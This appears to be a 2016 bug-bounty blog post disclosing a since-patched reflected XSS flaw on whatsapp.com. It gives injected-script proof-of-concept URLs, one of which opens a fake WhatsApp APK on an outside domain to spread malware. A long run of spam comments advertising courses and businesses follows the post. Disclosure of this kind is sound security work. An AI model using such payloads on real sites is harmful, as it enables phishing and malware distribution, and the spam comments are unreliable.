Sunday, 6 November 2016

WhatsApp : XSS vulnerability can be misused for Spreading Malware

bug bounty, cross-site scripting in Referer header, facebook bounty, facebook reward, Google bug bounty, whatsapp xss, xss in whats app 30 comments

WhatsApp XSS vulnerability can be misused for Spreading Malware

Little Insight:

[ According to FACEBOOK, This XSS could take advantage of the known domain to make phishing attacks easier or can be misused for Spreading Malware ]

Reward For Whatsapp XSS Vulnerability : 1000$

My Finding....

Domain: https://www.whatsapp.com

Poc url :

https://www.whatsapp.com/index.php/"><script>alert(document.domain)</script>

but you can think a little different

https://www.whatsapp.com/index.php/"><script>window.open("http://websecuritylog.com/whatsapp.apk")</script>

How this can be used to trick users to download a fake application (Malware - WhatsApp.apk) from other domain and easily can spreading malware..

More Information

The vulnerability mentioned here has been confirmed patched by the Facebook Security Team.

30 comments:

sheela rajesh12 April 2019 at 23:50
I am feeling great to read this.you gave a nice info for us.please update more.
JAVA Training in Chennai
Java training institute in chennai
Selenium Training in Chennai
Hadoop Training in Chennai
Python Training in Chennai
Software testing training in chennai
JAVA Training in Chennai
Java Training in Velachery
ReplyDelete
Replies
Sprint-Driving-School16 May 2019 at 23:41
Thanks for sharing informative article… learning driving from experienced instructors help you to learn driving very fast… Learn Melbourne driving lessons from experts at Sprint driving School. Check our driving lesson prices
ReplyDelete
Replies
Anbarasan1424 June 2019 at 05:14
I would like to value the time the author has taken to share this content with us. The author has focused on a single topic and explained it in detail.

Spoken English Classes in Chennai
Spoken English Class in Chennai
Spoken English in Chennai
IELTS Training in Chennai
IELTS Chennai
Best English Speaking Classes in Mumbai
Spoken English Classes in Mumbai
IELTS Mumbai
IELTS Center in Mumbai
IELTS Coaching in Anna Nagar
ReplyDelete
Replies
Kayal4 August 2019 at 22:48

You did very great work by adding some good information here. I received some ideas here and Thank you...

Tableau Training in Chennai
Tableau Certification
Oracle DBA Training in Chennai
Linux Training in Chennai
Social Media Marketing Courses in Chennai
Corporate Training in Chennai
Spark Training in Chennai
Pega Training in Chennai
Oracle Training in Chennai
Tableau Training in Vadapalani
ReplyDelete
Replies
Chris Hemsworth5 August 2019 at 03:07
The article is so informative. This is more helpful for our
Learn best software testing online certification course class in chennai with placement
Best selenium testing online course training in chennai
Best online software testing training course institute in chennai with placement
Thanks for sharing.
ReplyDelete
Replies
divi13 September 2019 at 04:37
awesome blog it's very nice and useful i got many more information it's really nice i like your blog styleweb design company in velachery
ReplyDelete
Replies
virgoacp19 September 2019 at 21:33
Awesome post. I am a normal visitor of your blog and appreciate you taking the time to maintain the excellent site. I’ll be a frequent visitor for a long time.

ACP Sheet
ACP Sheet Price
Aluminium Composite Panel
ACP Panel
ACP Sheets
ReplyDelete
Replies
Moving Men Removals20 September 2019 at 01:26
Thanks for excellent article. Moving Men Removals is the renowned local removalists Melbourne.
ReplyDelete
Replies
Adhuntt17 October 2019 at 01:35
Great blog thanks for sharing Searching for a SEO company in Chennai that can bring your brand to the top results page on Google? Look no further - Adhuntt Media, with their team of SEO experts, can make it happen that too for the best value.
digital marketing company in chennai
seo service in chennai
web designing company in chennai
social media marketing company in chennai
ReplyDelete
Replies
Karuna17 October 2019 at 04:18
Nice blog thanks for sharing Let’s be practical this special day and rent plants at the best price. Karuna Nursery Gardens offers amazing plant rental services in Chennai. Exquisite deals and truckloads of variety to aim to please even the most niche of tastes in our customers.
plant nursery in chennai
rental plants in chennai
corporate gardening service in chennai
ReplyDelete
Replies
Pixies17 October 2019 at 04:54
Excellent blog thanks for sharing It’s very important to have the best beauty parlour equipment to run a successful salon. Pixies Beauty Shop is the best place in Chennai to get high quality imported top brands at the best price.
Cosmetics Shop in Chennai
ReplyDelete
Replies
BPI North Melbourne18 October 2019 at 03:24
Thank you for sharing this blog post, it is very informative and helpful for me. building and pest inspections Melbourne.
ReplyDelete
Replies
pavithra dass19 December 2019 at 10:44
Pretty blog, so many ideas in a single site, thanks for the informative article, keep updating more article.
Java Training Institute in Chennai
Best JAVA Training Institute in Chennai
Java Training Institutes in Bangalore
Best Java Training Institutes in Bangalore
Java Training Institute in Coimbatore
Java Classes in Coimbatore
Java Course in Madurai
Java Training in Madurai
ReplyDelete
Replies
Indpac20 January 2020 at 03:21
Very useful blog thanks for sharing IndPac India the German technology Packaging and sealing machines in India is the leading manufacturer and exporter of Packing Machines in India.
ReplyDelete
Replies
shreekavi11 March 2020 at 03:25

Admire this blog. Keep sharing more updates like this
Ethical Hacking Course in Chennai
Ethical hacking course in bangalore
Ethical hacking course in coimbatore
Hacking Course in Bangalore
Ethical hacking Training institute in bangalore
Ethical Hacking institute in Bangalore
Ethical Hacking Training in Bangalore
Ethical Hacking in Bangalore
Software Testing Training in Chennai
Ielts coaching in bangalore
ReplyDelete
Replies
chandhran 18 March 2020 at 23:25
Pretty blog, i found some useful information from this blog, thanks for sharing the great information.
DOT NET Training in Bangalore
DOT NET Training in Chennai
Dot NET Training in Marathahalli
DOT NET Training Institute in Marathahalli
DOT NET Course in Bangalore
AWS Training in Bangalore
Data Science Courses in Bangalore
DevOps Training in Bangalore
PHP Training in Bangalore
Spoken English Classes in Bangalore
ReplyDelete
Replies
bairav10 July 2020 at 08:46
This blog is very helpful for us...I got some important information from this blog..
German Classes in Chennai | Certification | Language Learning Online Courses | GRE Coaching Classes in Chennai | Certification | Language Learning Online Courses | TOEFL Coaching in Chennai | Certification | Language Learning Online Courses | Spoken English Classes in Chennai | Certification | Communication Skills Training

ReplyDelete
Replies
bill.wood12 July 2020 at 13:32
in 1995 I decided to teach four fundamental ideas that are the foundations of Chemistry - atoms, molecules, the Periodic Table and chemical reactions. machine learning training in hyderabad
ReplyDelete
Replies
Data Science Course13 July 2020 at 23:27
This is an excellent post I seen thanks to share it. It is really what I wanted to see hope in future you will continue for sharing such a excellent post.

Data Science Course
ReplyDelete
Replies
Data Science Institute In Banglore14 July 2020 at 04:39
Excellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites!
Data Science Training Institute in Bangalore
ReplyDelete
Replies
Data Science Training14 July 2020 at 08:33
If you don"t mind proceed with this extraordinary work and I anticipate a greater amount of your magnificent blog entries.

Data Science Training
ReplyDelete
Replies
Best Data Science Courses In Bangalore 14 July 2020 at 10:48
Awesome blog. I enjoyed reading your articles. This is truly a great read for me. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work!
Best Data Science Courses in Bangalore
ReplyDelete
Replies
Ethical Hacking Course15 July 2020 at 03:09
After reading your article I was amazed. I know that you explain it very well. And I hope that other readers will also experience how I feel after reading your article.
Ethical Hacking Course in Bangalore
Certified Ethical Hacker Course
ReplyDelete
Replies
Ethical Hacking Training15 July 2020 at 07:28
Wow! Such an amazing and helpful post this is. I really really love it. I hope that you continue to do your work like this in the future also.
Ethical Hacking Training in Bangalore
Ethical Hacking Training
ReplyDelete
Replies
Ethical Hacking in Bangalore18 July 2020 at 03:11
I am impressed by the information that you have on this blog. Thanks for Sharing
Ethical Hacking in Bangalore
Certified Ethical Hacker Course
ReplyDelete
Replies
Raja Driving School31 July 2020 at 22:10
Thanks for sharing the great information, Driving School Broadmeadows | Driving school Bundoora
ReplyDelete
Replies
Sages Marketing21 August 2020 at 05:17
IT Company
IT Company
IT Company
IT Company
IT Company
IT Company
IT Company
IT Company
ReplyDelete
Replies
Sages Marketing21 August 2020 at 05:17
IT Company
IT Company
IT Company
IT Company
IT Company
IT Company
IT Company
IT Company
ReplyDelete
Replies
Ethical Hacking Course in Raipur - 360DigiTMG4 September 2020 at 21:39
Truly incredible blog found to be very impressive due to which the learners who ever go through it will try to explore themselves with the content to develop the skills to an extreme level. Eventually, thanking the blogger to come up with such an phenomenal content. Hope you aarrive with the similar content in future as well.

360DigiTMG Ethical Hacking Course
ReplyDelete
Replies